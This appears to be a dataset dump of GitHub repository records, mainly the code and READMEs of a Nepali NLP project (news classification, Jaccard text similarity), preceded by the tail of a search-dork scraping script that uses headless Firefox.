urllib.parse.quote_plus(args.dork)\nbase_url = \"https://duckduckgo.com/?q=%s&t=hc&va=u&ia=web\"%(encoded_dork)\n\nprint(\"Full URL used in search: %s\\n\" % base_url)\nprint(\"Searching, please be patient this may take a little while\\n\\n\")\n\nopts = Options()\nopts.set_headless()\nassert opts.headless\nbrowser = Firefox(executable_path=\"./geckodriver\",options=opts)\nbrowser.get(base_url)\nbrowser.implicitly_wait(5)\n\n#grabs first page search results so that DOM can detach\nresults = []\nbrowser.implicitly_wait(5)\ninitial_results= browser.find_elements_by_class_name('result')\nfor i in range(len(initial_results)):\n\tresults.append(initial_results[i].text)\n\nsleep(2)\n\n# Returns X amount of pages as specified with the results arg\ntry:\n\tfor i in range(args.results):\n\t\tbrowser.execute_script(\"document.getElementsByClassName('result--more__btn btn btn--full')[0].click()\") # Finds the More Results button and clicks it\n\t\tsleep(1.5)\n\t\ttemp_res = browser.find_elements_by_class_name('result')\n\t\tfor i in range(len(temp_res)):\n\t\t\tresults.append(temp_res[i].text)\t\n\t\nexcept Exception as e:\n\tprint('''Unable to scroll for more pages. This could mean that your search returned only 1 page of results\nor that something is blocking this script from scrolling further. Recommended that you search the dork\nterm manually in a browser to verify this is not an error.\\n\\n''')\nbrowser.close()\nnow = datetime.datetime.now()\nnow_file_fmt = now.strftime('%Y-%m-%d_%H.%M.%S')+\".log\"\nprint('RESULTS:\\n')\nresults_file = open(now_file_fmt,\"w\")\nfor i in range(len(results)):\n\tprint(results[i]+'\\n\\n')\n\tresults_file.write(results[i]+'\\n\\n')\nresults_file.close()\n\n" } ]
5
ekbanasolutions/Nepali-NLP
https://github.com/ekbanasolutions/Nepali-NLP
1f6a5f24e83b0c2b7ef18395aed1c84f745ded0c
bdd27d9132f11232ae54be0c6336f86a2a475566
9e11ba774a6d7e80b2bb3cc6209d1f82ce2c1655
refs/heads/master
2020-04-25T02:30:45.324488
2019-08-29T05:07:16
2019-08-29T05:07:16
172,442,476
2
1
Apache-2.0
2019-02-25T05:50:15
2019-08-29T04:43:57
2019-08-29T05:07:17
Python
[ { "alpha_fraction": 0.6050724387168884, "alphanum_fraction": 0.6211180090904236, "avg_line_length": 30.68852424621582, "blob_id": "84c61ff89a69f478a3728c6843b9fba202ac7903", "content_id": "cdc23389561f7916de4dbb501278d094108e889e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2014, "license_type": "permissive", "max_line_length": 108, "num_lines": 61, "path": "/Nepali-News-Classification/train_classifier.py", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "import nltk\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\nimport pickle\n\nstopWords = set(nltk.corpus.stopwords.words('nepali'))\n# vect = TfidfVectorizer(tokenizer= lambda x: x.split(\" \"),\n# sublinear_tf=True, encoding='utf-8',\n# decode_error='ignore',\n# max_df=0.5,\n# min_df=10,\n# stop_words=stopWords)\n\nvect = TfidfVectorizer(sublinear_tf=True, encoding='utf-8',\n decode_error='ignore',stop_words=stopWords)\n\noutput_dict = {\n 0:\"auto\",\n 1:\"bank\",\n 2:\"blog\",\n 3:\"business\",\n 4:\"economy\",\n 5:\"education\",\n 6:\"employment\",\n 7:\"entertainment\",\n 8:\"interview\",\n 9:\"literature\",\n 10:\"national_news\",\n 11: \"opinion\",\n 12:\"sports\",\n 13: \"technology\",\n 14: \"tourism\",\n 15: \"world\"\n}\n\n\ntrainNews = pd.read_csv(\"./data/train.csv\")\ntestNews = pd.read_csv(\"./data/test.csv\")\nxTrain = trainNews['text']\nyTrain = trainNews['label']\n\ntfidf = vect.fit(xTrain.values.astype('U'))\nxTrainvect = vect.fit_transform(xTrain)\nyTrainvect = yTrain\nxTestvect = vect.transform(testNews['text'])\nyTestvect = testNews['label']\n\nmodel = MultinomialNB(alpha=0.01, fit_prior=True)\nmodel.fit(xTrainvect, yTrainvect)\n\nypred = model.predict(xTestvect)\nscore = accuracy_score(yTestvect, ypred)\nprint (\"Accuracy: \",score)\npickle.dump(model, open(\"/Nepali-NLP/Nepali-News-Classification/models/news_classifier_model.pickle\", 'wb'))\npickle.dump(tfidf, open(\"/Nepali-NLP/Nepali-News-Classification/models/news_vectorizer.pickle\", \"wb\"))\n####TEST#####\ntest = \"नेपालको छवि विगतको तुलनामा उच्च : मन्त्री ज्ञवाली\"\nyPred = model.predict(vect.transform([test]))\nprint (\"OUTPUT: \", output_dict[int(yPred)])" }, { "alpha_fraction": 0.5617740154266357, "alphanum_fraction": 0.5860612392425537, "avg_line_length": 22.700000762939453, "blob_id": "e679cfd0d758f4b61ce9d50e5b52bf4a285273b2", "content_id": "9875beb102c873f6c7e93ed022483f12073ca462", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "permissive", "max_line_length": 108, "num_lines": 40, "path": "/Nepali-News-Classification/news_classifier.py", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "import nltk\nimport pickle\n\nstopWords = set(nltk.corpus.stopwords.words('nepali'))\n\n\noutput_dict = {\n 0:\"auto\",\n 1:\"bank\",\n 2:\"blog\",\n 3:\"business\",\n 4:\"economy\",\n 5:\"education\",\n 6:\"employment\",\n 7:\"entertainment\",\n 8:\"interview\",\n 9:\"literature\",\n 10:\"national_news\",\n 11: \"opinion\",\n 12:\"sports\",\n 13: \"technology\",\n 14: \"tourism\",\n 15: \"world\"\n}\n\n\"\"\"\nLoad the trained model and vectorizer pickle\n\"\"\"\n\nmodel = pickle.load(open(\"Nepali-NLP/Nepali-News-Classification/models/news_classifier_model.pickle\", 'rb'))\nvectorizer = pickle.load( open(\"+-*9-+-----+\"\n \"+\"\n \"Nepali-NLP/Nepali-News-Classification/models/news_vectorizer.pickle\", \"rb\"))\n\n\"\"\"\npredict the classes for the text\n\"\"\"\ntest = \"नेपालको छवि विगतको तुलनामा उच्च : मन्त्री ज्ञवाली\"\nyPred = model.predict(vectorizer.transform([test]))\nprint (\"OUTPUT: \", output_dict[int(yPred)])" }, { "alpha_fraction": 0.5485380291938782, "alphanum_fraction": 0.6233918070793152, "avg_line_length": 29.5, "blob_id": "e22c3d19c5b61e4b94e04593fc4846e51d9cf4e8", "content_id": "a94d6d07b7724a33f879d95d4f8aeb4569ebe6c2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 855, "license_type": "permissive", "max_line_length": 128, "num_lines": 28, "path": "/Nepali-News-Classification/README.md", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "Algorithm used: MultinomialNB<br>\nAccuracy: 0.8713984539704849<br>\n<br>\nOur dataset has data for each category:<br>\nauto: 82<br>\nbank: 310<br>\nblog: 187<br>\nbusiness: 123<br>\neconomy: 1058<br>\neducation: 75<br>\nemployment: 132<br>\nentertainment: 1046<br>\ninterview: 78<br>\nliterature: 14<br>\nnational_news: 6591<br>\nopinion: 502<br>\nsports: 2041<br>\ntechnology: 92<br>\ntourism: 189<br>\nworld: 187<br>\n<br>\nsample train data and sample test data is provided in the data folder. You can add more data by scraping some news websites.<br>\n<br>\n# To train your classifier\nrun train_classifier.py\n<br>\n# To predict the classes\nrun news_classifier.py which uses the trained models saved from train_classifier.py. \n" }, { "alpha_fraction": 0.8409090638160706, "alphanum_fraction": 0.8409090638160706, "avg_line_length": 43.5, "blob_id": "312594a099c1dffcafbf18dacc67476e3cf4cf3c", "content_id": "1759ebbe2c7103a9bcf98046593aac913dc666a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 88, "license_type": "permissive", "max_line_length": 49, "num_lines": 2, "path": "/Nepali-Text-similarity/README.md", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "# Nepali Text Similarity Using Jaccard Similarity\nCheck the similarity between two text." }, { "alpha_fraction": 0.5309523940086365, "alphanum_fraction": 0.5476190447807312, "avg_line_length": 29, "blob_id": "f172b6b0bd75fe16347b3ca298454dd771cec41a", "content_id": "e90b5af33af2c6bb740141d6ba7ef5f5897c739b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "permissive", "max_line_length": 84, "num_lines": 42, "path": "/Nepali-Text-similarity/nepali_text_similarity.py", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "import re\nimport string\n\nexclude = set(string.punctuation)\n\ndef pre_pro(text):\n \"\"\"\n cleaning the text\n \"\"\"\n text = text.lower()\n text = re.sub( '\\s+', ' ', text ).strip()\n text = re.sub( '&\\w*;', ' ', text ) #eg: &nbsp;\n text = re.sub( '#\\d+;', ' ', text ) #eg: #1223;\n text = re.sub( '&#\\d+;', ' ', text ) #eg: &#fffee;\n text = re.sub( '<\\w.*>', ' ', text ) #eg: <html>\n text = ''.join(ch for ch in text if ch not in exclude)\n return text\n\n\ndef jaccard(set_a, set_b):\n \"\"\"\n calculate the distance between two text\n Jaccard Similairty: J(a,b) = |A ∩ B|/|A ∪ B|.\n \"\"\"\n intersection = set_a & set_b\n union = set_a | set_b\n if len(union) > 0:\n return len(intersection) / len(union)\n else:\n return 0\n\ndef text_similarity(text1,text2):\n text1_set = set([x for x in text1.lower().split()])\n text2_set = set([x for x in text2.lower().split()])\n jaccard_similarity = jaccard(text1_set, text2_set)\n return int(jaccard_similarity*100)\n\ntext1 = \"\"\" मलाई स्याउ खान मन छ । एप्पल स्वास्थ्य को लागी धेरै राम्रो छ\"\"\"\ntext2 = \"\"\"मलाई धेरै नै स्याउ खान मन पर्छ । एप्पल स्वास्थ्य को लागी धेरै राम्रो छ\"\"\"\n\nsim_score = text_similarity(text1,text2)\nprint (\"The two documents are \"+str(sim_score)+\"% similar\")\n" }, { "alpha_fraction": 0.7954545617103577, "alphanum_fraction": 0.7954545617103577, "avg_line_length": 21, "blob_id": "4f3314b7f2e214a1019ed4f21947bc3b2a18f419", "content_id": "4c10ed8d7dc18c38138735bddc93c1d006df7748", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "permissive", "max_line_length": 30, "num_lines": 2, "path": "/README.md", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "# Nepali-NLP\nNLP stuffs for Nepali language\n" } ]
6
sronen71/ml-challenge
https://github.com/sronen71/ml-challenge
377f289a329a259e51dbb1f1d4de7735f92bf421
ffd46252128642b47db005e37883278ea94ff43c
982a9eb2a0b0b516fa7ee9f0a201f989c196b1df
refs/heads/main
2023-06-25T00:51:45.715647
2021-07-26T08:58:21
2021-07-26T08:58:21
389,222,187
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6150442361831665, "alphanum_fraction": 0.627212405204773, "avg_line_length": 31.071428298950195, "blob_id": "0fab5160efbc8c58395e7557b7b0f0365c7a539a", "content_id": "f8d2eb7eb5b1aad1173f7c2447672b6747c1e64e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 904, "license_type": "no_license", "max_line_length": 120, "num_lines": 28, "path": "/kinase.py", "repo_name": "sronen71/ml-challenge", "src_encoding": "UTF-8", "text": "\nimport pandas as pd\nfrom rdkit import Chem\nfrom rdkit.Chem.Draw import IPythonConsole\n\ndef smiles_tokenizer(smi):\n \"\"\" \n Tokenize a SMILES string representation of a molecule\n Returns a list of tokens in SMILES vocabulary\n \"\"\"\n import re\n pattern = \"(\\[[^\\]]+]|Br?|Cl?|N|O|S|P|F|I|b|c|n|o|s|p|\\(|\\)|\\.|=|#|-|\\+|\\\\\\\\|\\/|:|~|@|\\?|>|\\*|\\$|\\%[0-9]{2}|[0-9])\"\n regex = re.compile(pattern)\n tokens = [token for token in regex.findall(smi)]\n assert smi == ''.join(tokens)\n return tokens\n\n\ndef main():\n df = pd.read_csv('./kinase_JAK.csv')\n print(df.head())\n print(df.groupby(['measurement_type']).count())\n\ndef get_mol(smi):\n #IPythonConsole.molSize = (400, 300)\n #IPythonConsole.ipython_useSVG=True\n # Chem.MolFromSmiles returns a Chem.Mol object, which rdkit automatically visualizes in a jupyter notebook\n mol= Chem.MolFromSmiles(smi)\n return mol\n\n\n\n\n\n" } ]
1
mxzgit/Sklearn-ML
https://github.com/mxzgit/Sklearn-ML
9e65446701e787a964e7fd87206be9b721a13a86
1994cd8b5c42553f0b952e0ac9c0ef3b50385463
6cb6da651e1837d64689d3a69136f8db3073a1dd
refs/heads/master
2020-06-03T21:02:08.879407
2019-07-22T15:02:54
2019-07-22T15:02:54
191,729,905
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6056337952613831, "alphanum_fraction": 0.6619718074798584, "avg_line_length": 35, "blob_id": "66363f8804578096b16bf0a8c20d5ded87c8d89e", "content_id": "d3d5fbd401c73420372c1b7c5ef59f2bea4b1538", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 71, "license_type": "no_license", "max_line_length": 50, "num_lines": 2, "path": "/challenge/functions.py", "repo_name": "mxzgit/Sklearn-ML", "src_encoding": "UTF-8", "text": "def cell_null(data):\n return data.isnull().sum()/data.shape[0] * 100" }, { "alpha_fraction": 0.5740086436271667, "alphanum_fraction": 0.58460932970047, "avg_line_length": 27.93181800842285, "blob_id": "5454e33b684fce6f354c3dcd7824b08dc6f1b123", "content_id": "dbfa46032af4c888b6a12360c9a28cbde7dd5b6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2547, "license_type": "no_license", "max_line_length": 81, "num_lines": 88, "path": "/Models/LinearSVC.py", "repo_name": "mxzgit/Sklearn-ML", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nfrom sklearn import svm \nfrom sklearn.metrics import accuracy_score\nfrom collections import Counter\n\ndef make_Dictionary(root_dir):\n\n \"\"\"[summary]\n \n Arguments:\n root_dir {string} -- directory of emails\n \n Returns:\n dic -- dictinary of most 3000 comon words and their count repetition\n \"\"\"\n \n all_words = []\n emails = [os.path.join(root_dir,f) for f in os.listdir(root_dir)]\n for email in emails:\n with open(email) as m:\n for line in m:\n words = line.split()\n all_words += words\n\n dictionary = Counter(all_words)\n list_to_remove = list(dictionary)\n\n for item in list_to_remove:\n if item.isalpha() == False:\n del dictionary[item]\n elif len(item) == 1:\n del dictionary[item]\n\n dictionary = dictionary.most_common(3000)\n\n return dictionary\n\n\ndef extract_feature(mail_dir):\n files = [os.path.join(mail_dir,fi) for fi in os.listdir(mail_dir)]\n features_matrix = np.zeroes((len(files),3000))\n train_labels = np.zeroes(len(files))\n count = 0\n docID = 0\n for fil in files:\n with open(fil) as fi:\n for i,line in enumerate(fi):\n if i ==2:\n words = line.split()\n for word in word:\n wordID = 0\n for i,d in enumerate(dictionary):\n if d[0] == word:\n wordID = i\n features_matrix[docID,wordID] = words.count(word)\n \n train_labels[docID] = 0\n filepathTokens = fil.split('/')\n lastToken = filepathTokens[len(filepathTokens) - 1]\n if lastToken.startswith(\"spmsg\"):\n train_labels[docID] = 1\n count += 1\n docID += 1\n return features_matrix, train_labels\n\n\nTRAIN_DIR = \"../Data/train-mails\"\nTEST_DIR = \"../Data/test-mails\"\n\ndictionary = make_Dictionary(TEST_DIR)\n\nprint(\"reading and processing emails from file.\")\nfeatures_matrix, labels = extract_feature(TRAIN_DIR)\ntest_feature_matrix, test_labels = extract_feature(TEST_DIR)\n\nmodel = svm.SVC()\n\nprint(\"Training model.\")\n# train model\nfeatures_matrix = features_matrix[:len(features_matrix)/10]\nlabels = labels[:len(labels)/10]\nmodel.fit(features_matrix, labels)\n\npredicted_labels = model.predict(test_feature_matrix)\n\nprint(\"FINISHED classifying. accuracy score : \")\nprint(accuracy_score(test_labels, predicted_labels))\n\n" }, { "alpha_fraction": 0.7810945510864258, "alphanum_fraction": 0.7810945510864258, "avg_line_length": 49.25, "blob_id": "24ae3df4131aec99bf51701b84042212832f44c5", "content_id": "aa89d44102070316aeb6747673ca7601199fa800", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 201, "license_type": "no_license", "max_line_length": 122, "num_lines": 4, "path": "/README.md", "repo_name": "mxzgit/Sklearn-ML", "src_encoding": "UTF-8", "text": "# Sklearn-ML\nIn this repository we will test the famous Machine learning library scikit-learn, based on cheat sheet provided by sklearn\n\n![alt text](https://scikit-learn.org/stable/_static/ml_map.png)\n" } ]
3
DrewMcMillen/50_In_07
https://github.com/DrewMcMillen/50_In_07
1cc61b5962390378fa57cd9af0b420d2bd3eabb4
a8ac1bffd80e59fb13ecf51210d23912439ccc10
4b106e44c964c52a903bbb1f1edc9069b70a1a15
refs/heads/master
2020-06-29T03:38:30.650169
2019-10-12T18:42:40
2019-10-12T18:42:40
200,429,601
0
0
null
2019-08-03T23:22:32
2019-08-03T23:23:55
2019-10-12T18:42:41
null
[ { "alpha_fraction": 0.588921308517456, "alphanum_fraction": 0.6044703722000122, "avg_line_length": 35.75, "blob_id": "ca009d1f1587ef7d46b985cb0085014120e79465", "content_id": "6396d0a250372b06f78a51230799b9f20a5f7557", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 116, "num_lines": 28, "path": "/config_tanya/config.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "class ScraperConfig:\n\n def __init__(self):\n self.script_name = ''\n self.baseurl = ''\n self.template = ''\n self.playertemplate = ''\n self.dest = ''\n self.playermetrics = ['standard', 'possession', 'miscellaneous', 'playoffs', 'other',\n 'similarity', 'penalty', 'goalie_advanced', 'hat_tricks', 'ot_goals']\n\n def setconfig(self, script_name, baseurl, date, extrametrics=''):\n self.script_name = script_name\n self.baseurl = baseurl\n self.template = '/Users/tanyatang/Documents/Code/Python/50_In_07/data_tanya/templates/template_1.xlsx'\n self.playertemplate = '/Users/tanyatang/Documents/Code/Python/50_In_07/data_tanya/templates/template_2.xlsx'\n self.dest = '/Users/tanyatang/Documents/Code/Python/50_In_07/data_tanya/data_raw/' + date + '/'\n for metric in extrametrics:\n self.playermetrics.append(metric)\n\n\nclass Config:\n\n def __init__(self):\n i = 0\n\n def setconfig(self):\n i = 0\n" }, { "alpha_fraction": 0.5740326642990112, "alphanum_fraction": 0.5778160095214844, "avg_line_length": 38.557823181152344, "blob_id": "68712eac92851240422759bfde6ad770f7b800c1", "content_id": "e3a0ad9514f6e81d36ba8f7d12884fd81cf4ba29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5815, "license_type": "no_license", "max_line_length": 103, "num_lines": 147, "path": "/config_tanya/scraper.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup, Comment\nimport config_tanya.scraper_header as header\nimport urllib.request\nimport shutil\nimport openpyxl as op\n\n\ndef scrape1(config, url, short_name):\n\n # Find overall info for team\n teampage = urllib.request.urlopen(url)\n teamsoup = BeautifulSoup(teampage, 'html.parser')\n summarytable = teamsoup.find('table', {'class': 'sortable stats_table'}, id=short_name)\n\n # Create arrays to hold info, will be in descending order from most current season to oldest season\n years_active_urls = []\n team_data = []\n\n # Go through each row of summary table\n for row in summarytable.findAll('tr'):\n\n # Get data\n cells = row.findAll('td')\n columns = row.findAll('th')\n if not len(cells) == 0 and not len(columns) == 0:\n for item in columns:\n years_active_urls.append(config.baseurl + item.find('a', href=True)['href'])\n team_data.append(header.get_row_data(cells, columns))\n\n # Write team data to file\n dest = config.dest + short_name + '.xlsx'\n shutil.copyfile(config.template, dest)\n workbook = op.load_workbook(dest)\n sheet = workbook['overall_info']\n for i in range(len(team_data)):\n for j in range(len(team_data[i])):\n sheet.cell(row=i + 1, column=j + 1).value = team_data[i][j]\n workbook.save(dest)\n\n # Find team members for most current season\n seasonurl = years_active_urls[0]\n seasonpage = urllib.request.urlopen(seasonurl)\n seasonsoup = BeautifulSoup(seasonpage, 'html.parser')\n rostertable = seasonsoup.find('table', {'class': 'sortable stats_table'}, id='roster')\n\n # Create arrays to hold summarized info\n player_urls = []\n player_sumdata = []\n\n # Go through each row of roster table\n for row in rostertable.findAll('tr'):\n\n # Get data\n cells = row.findAll('td')\n columns = row.findAll('th')\n if not len(cells) == 0 and not len(columns) == 0:\n player_urls.append(config.baseurl + cells[0].find('a', href=True)['href'])\n player_sumdata.append(header.get_row_data(cells, columns))\n\n # Write roster data to file\n sheet = workbook['current_roster']\n for i in range(len(player_sumdata)):\n for j in range(len(player_sumdata[i])):\n sheet.cell(row=i + 1, column=j + 1).value = player_sumdata[i][j]\n workbook.save(dest)\n workbook.close()\n\n # List all relevant metrics for a player\n player_metrics_titles = config.playermetrics\n player_metrics = []\n\n # Iterate through each player\n for i in range(len(player_urls)):\n\n currentplayer = []\n\n try:\n\n # Find detailed information for each player\n playerpage = urllib.request.urlopen(player_urls[i])\n playersoup = BeautifulSoup(playerpage, 'html.parser')\n\n # Get all placeholder texts\n all_comments = playersoup.find_all(string=lambda text: isinstance(text, Comment))\n table_comments = ['']\n table_titles = ['standard']\n for c in all_comments:\n if 'skaters_advanced' in c:\n table_comments.append(c)\n table_titles.append('possession')\n elif 'stats_misc_plus_nhl' in c:\n table_comments.append(c)\n table_titles.append('miscellaneous')\n elif 'stats_basic_plus_nhl_po' in c:\n table_comments.append(c)\n table_titles.append('playoffs')\n elif 'stats_basic_minus_other' in c:\n table_comments.append(c)\n table_titles.append('other')\n elif 'similarity_scores' in c:\n table_comments.append(c)\n table_titles.append('similarity')\n elif 'penalty_shots' in c:\n table_comments.append(c)\n table_titles.append('penalty')\n elif 'stats_goalie_situational' in c:\n table_comments.append(c)\n table_titles.append('goalie_advanced')\n elif 'hat_tricks' in c:\n table_comments.append(c)\n table_titles.append('hat_tricks')\n elif 'playoff_ot_goals' in c:\n table_comments.append(c)\n table_titles.append('ot_goals')\n\n # Get player metrics\n for title in player_metrics_titles:\n currenttitle = []\n for j in range(len(table_titles)):\n if table_titles[j] == title:\n currenttitle = header.get_table_data(title, playersoup, table_comments[j])\n currentplayer.append(currenttitle)\n player_metrics.append(currentplayer)\n print(player_sumdata[i + 1][1] + ' complete')\n\n except AttributeError:\n\n # If a player has no historical data\n print(player_sumdata[i + 1][1] + \" has no information available\")\n player_metrics.append(currentplayer)\n\n for i in range(len(player_metrics)):\n\n # Write player data to file\n playerdest = dest = config.dest + 'players/' + player_sumdata[i + 1][1] + '.xlsx'\n shutil.copyfile(config.playertemplate, playerdest)\n workbook = op.load_workbook(dest)\n if len(player_metrics[i]) > 0:\n for metric, title in zip(player_metrics[i], player_metrics_titles):\n workbook.create_sheet(title)\n sheet = workbook[title]\n for j in range(len(metric)):\n for k in range(len(metric[0])):\n sheet.cell(row=j + 1, column=k + 1).value = metric[j][k]\n workbook.remove(workbook['temp'])\n workbook.save(playerdest)\n workbook.close()\n" }, { "alpha_fraction": 0.5298013091087341, "alphanum_fraction": 0.5364238619804382, "avg_line_length": 15.777777671813965, "blob_id": "5a63e5d51d2552928a4f7961b6a505dcef8a68b4", "content_id": "310229d4e94c07928c3df1c274de12687f39991f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 302, "license_type": "no_license", "max_line_length": 39, "num_lines": 18, "path": "/config_tanya/header.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "class Team:\n\n def __init__(self, name, filepath):\n self.name = name\n self.filepath = filepath\n\n def getinfo(self):\n i = 0\n\n\nclass Player:\n\n def __init__(self, name, filepath):\n self.name = name\n self.filepath = filepath\n\n def getinfo(self):\n i = 0\n" }, { "alpha_fraction": 0.7137150168418884, "alphanum_fraction": 0.7350199818611145, "avg_line_length": 26.814815521240234, "blob_id": "63c088794c4662313e2718ffb1d4c727efcc8c17", "content_id": "8f5f38b8a605e6ae4c5e9f94ae7178207c164d8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 751, "license_type": "no_license", "max_line_length": 57, "num_lines": 27, "path": "/bin_tanya/run_scraper.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "from config_tanya.config import ScraperConfig\nimport config_tanya.scraper_header as header\nfrom config_tanya.scraper import scrape1\nimport os\n\nscript_name = 'scraper'\nbaseurl = 'https://www.hockey-reference.com'\ndate = '082419'\nconfig1 = ScraperConfig()\nconfig1.setconfig(script_name, baseurl, date)\n\n# Get team names\nteams_short = header.import_shortnames(config1)\nteams_long = header.import_longnames(config1)\n\n# Create team urls\nteams_url = []\nfor team in teams_short:\n url = baseurl + '/teams/' + team\n teams_url.append(url)\n\n# Get team info\nos.mkdir(config1.dest)\nos.mkdir(config1.dest + 'players/')\nfor url, name in zip(teams_url, teams_short):\n if config1.script_name == 'hockey_reference_scraper':\n scrape1(config1, url, name)\n" }, { "alpha_fraction": 0.49923762679100037, "alphanum_fraction": 0.5053365230560303, "avg_line_length": 38.57758712768555, "blob_id": "d3376750a5159f714cda61712fc3e9821de79c12", "content_id": "4da63fdf8cf6a40e26f6c5589f907c8146868906", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4591, "license_type": "no_license", "max_line_length": 98, "num_lines": 116, "path": "/config_tanya/scraper_header.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport urllib.request\n\n\ndef import_shortnames(config):\n teamnames = []\n url = config.baseurl + '/teams/'\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, 'html.parser')\n franchisetable = soup.find('table', {'class': 'sortable stats_table'}, id='active_franchises')\n for row in franchisetable.findAll('tr'):\n columns = row.findAll('th')\n for item in columns:\n if item.find(text=True) and item['class'][0] == 'left':\n teamnames.append(item.find(href=True)['href'][-4:-1])\n return teamnames\n\n\ndef import_longnames(config):\n teamnames = []\n url = config.baseurl + '/teams/'\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, 'html.parser')\n franchisetable = soup.find('table', {'class': 'sortable stats_table'}, id='active_franchises')\n for row in franchisetable.findAll('tr'):\n columns = row.findAll('th')\n for item in columns:\n if item.find(text=True) and item['class'][0] == 'left':\n teamnames.append(item.find(text=True))\n return teamnames\n\n\ndef get_row_data(cells, columns):\n data = []\n if len(cells) == 0:\n for item in columns:\n data.append(item.find(text=True))\n elif len(columns) == 0:\n for item in cells:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n elif len(columns) == 1:\n for item in columns:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n for item in cells:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n else:\n for item in cells:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n for item in columns:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n return data\n\n\ndef get_table_data(title, playersoup, comment):\n if title == 'standard':\n currentstandard = []\n standardtable = playersoup.find('table', {'class': 'row_summable sortable stats_table'},\n id='stats_basic_plus_nhl')\n for row in standardtable.findAll('tr'):\n cells = row.findAll('th')\n columns = row.findAll('td')\n currentstandard.append(get_row_data(cells, columns))\n return currentstandard\n else:\n currentdata = []\n soup = BeautifulSoup(comment, 'html.parser')\n for row in soup.findAll('tr'):\n cells = row.findAll('th')\n columns = row.findAll('td')\n currentdata.append(get_row_data(cells, columns))\n return currentdata\n" }, { "alpha_fraction": 0.7878788113594055, "alphanum_fraction": 0.7878788113594055, "avg_line_length": 18.799999237060547, "blob_id": "30ff9b57faec18a1ff756f54a66d3efdaf61fd16", "content_id": "d840c9b1444040dbbff27d1227a41606edb8343c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 44, "num_lines": 10, "path": "/bin_tanya/run_basic.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "from config_tanya.header import Team, Player\nfrom config_tanya.config import Config\n\n# Set up config object\n\n# Construct team objects\n\n# Construct player objects for each team\n\n# Basic ML algorithm\n" } ]
6
datalad/datalad
https://github.com/datalad/datalad
2d9c247344d340325ba84e7ab674ac320e57f30c
40332b5ad25bf8744f7399f6c3575f7d28f71384
76f23cc69dc10c44bc7cf00b78e37db04c7a9c45
refs/heads/maint
2023-09-04T11:03:02.264714
2023-08-10T15:56:19
2023-08-10T15:56:19
14,052,034
453
134
NOASSERTION
2013-11-01T19:40:08
2023-09-06T23:55:10
2023-09-14T19:10:17
